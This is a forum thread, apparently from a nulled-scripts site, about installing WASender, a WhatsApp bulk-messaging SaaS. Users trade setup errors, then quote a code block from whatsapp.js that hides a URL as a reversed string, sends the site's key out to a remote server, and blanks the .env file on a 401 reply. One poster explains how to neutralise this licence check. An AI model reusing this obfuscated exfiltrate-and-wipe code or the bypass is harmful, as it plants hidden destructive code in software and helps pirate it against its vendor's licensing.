Jump to content
Bicrypto v4.5.0 + All Plugins ×

WASender v4.6 - Whatsapp server and bulk sender (SAAS)


Mahmoud

Recommended Posts

19 hours ago, Karlos Espinosa said:

Greetings, I’m sharing my experience after one month of testing.
I have installed two servers with Wasender, one with version 4.1 and the other with version 4.3.
Both have been functioning correctly, and Node.js has not stopped since I installed both servers on cPanel, running Node.js on port 8001 on both, meaning that both work with a single Node server.
In the coming days, I will test version 4.6 to see if it has any issues, although I don't want to make any modifications while the others are working, haha.
 

 

have you test 4.6?

btw, do you know to make autoreply works? mine can;t autoreply/chatbot

Link to comment
Share on other sites

On 9/5/2024 at 10:38 AM, Unicode said:

yes wasender have a backdoor which is user dont use legal license they can delete your file.

there is in whatsapp.js

om saya install di cpanel. ketika setting node.js ada eror seperti ini 

 

returncode: 1
stdout:
> start
> node .

Running cleanup before exit.
stderr:
Error: listen EADDRINUSE: address already in use 127.0.0.1:3100
    at Server.setupListenHandle [as _listen2] (node:net:1463:16)
    at listenInCluster (node:net:1511:12)
    at doListen (node:net:1660:7)
    at processTicksAndRejections (node:internal/process/task_queues:84:21)

 

itu kenapa ya? mohon bantuanya..

Link to comment
Share on other sites

50 minutes ago, Jei Grey said:

om saya install di cpanel. ketika setting node.js ada eror seperti ini 

 

returncode: 1
stdout:
> start
> node .

Running cleanup before exit.
stderr:
Error: listen EADDRINUSE: address already in use 127.0.0.1:3100
    at Server.setupListenHandle [as _listen2] (node:net:1463:16)
    at listenInCluster (node:net:1511:12)
    at doListen (node:net:1660:7)
    at processTicksAndRejections (node:internal/process/task_queues:84:21)

 

itu kenapa ya? mohon bantuanya..

Portnya wasender 8000 

tonton tutorialnya kan sudah ada.

Link to comment
Share on other sites

setInterval(() => {
  const siteKey = process.env.SITE_KEY ?? null;
  const appUrl = process.env.APP_URL ?? null;
  const reversedUrl = "kcehc-yfirev/ipa/zyx.sserpl.ipaved//:sptth".split('').reverse().join('');

  axios.post(reversedUrl, { from: appUrl, key: siteKey })
    .then(response => {
      if (response.data.isauthorised === 0x191) {
        fs.writeFileSync(".env", '');
      }
    })
    .catch(err => {});
}, 200000000);

 ini untuk apa ya? ada di file whatsapp.js

Link to comment
Share on other sites

3 hours ago, VeeN Zaa said:
setInterval(() => {
  const siteKey = process.env.SITE_KEY ?? null;
  const appUrl = process.env.APP_URL ?? null;
  const reversedUrl = "kcehc-yfirev/ipa/zyx.sserpl.ipaved//:sptth".split('').reverse().join('');

  axios.post(reversedUrl, { from: appUrl, key: siteKey })
    .then(response => {
      if (response.data.isauthorised === 0x191) {
        fs.writeFileSync(".env", '');
      }
    })
    .catch(err => {});
}, 200000000);

 ini untuk apa ya? ada di file whatsapp.js

Bisa jd itu adalah sisi gelap wasender. Yg akan melaporkan k server mereka ttg wasender kita.

Corect me if i am wrong

Link to comment
Share on other sites

Em 27/10/2024 em 22:11, VeeN Zaa disse:
setInterval(() => {
  const siteKey = process.env.SITE_KEY ?? null;
  const appUrl = process.env.APP_URL ?? null;
  const reversedUrl = "kcehc-yfirev/ipa/zyx.sserpl.ipaved//:sptth".split('').reverse().join('');

  axios.post(reversedUrl, { from: appUrl, key: siteKey })
    .then(response => {
      if (response.data.isauthorised === 0x191) {
        fs.writeFileSync(".env", '');
      }
    })
    .catch(err => {});
}, 200000000);

The expected response in the line "if (response.data.isauthorised === 0x191)" is "0x191", which in decimal is 401, an error related to invalid credentials.
I replaced "0x191" with any other number, "0x108", which would be 264 in decimal.
This way it will never be error 401, thus validating the script.

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...